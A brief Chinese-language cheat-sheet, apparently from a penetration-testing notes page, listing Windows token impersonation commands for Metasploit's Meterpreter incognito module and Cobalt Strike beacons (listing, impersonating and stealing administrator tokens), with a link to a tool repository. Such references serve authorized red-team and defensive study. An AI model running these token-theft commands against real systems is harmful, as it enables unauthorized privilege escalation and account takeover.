MSF
Meterpreter>use incognito Meterpreter>list_tokens -u Meterpreter>impersonate_token name\\administrator & Meterpreter>ps Meterpreter>steal_token pid
Cobalt strike
beacon> steal_token 1234 窃取令牌 beacon> rev2self 恢复令牌 Windows https://gitee.com/RichChigga/incognito2
最后更新于1年前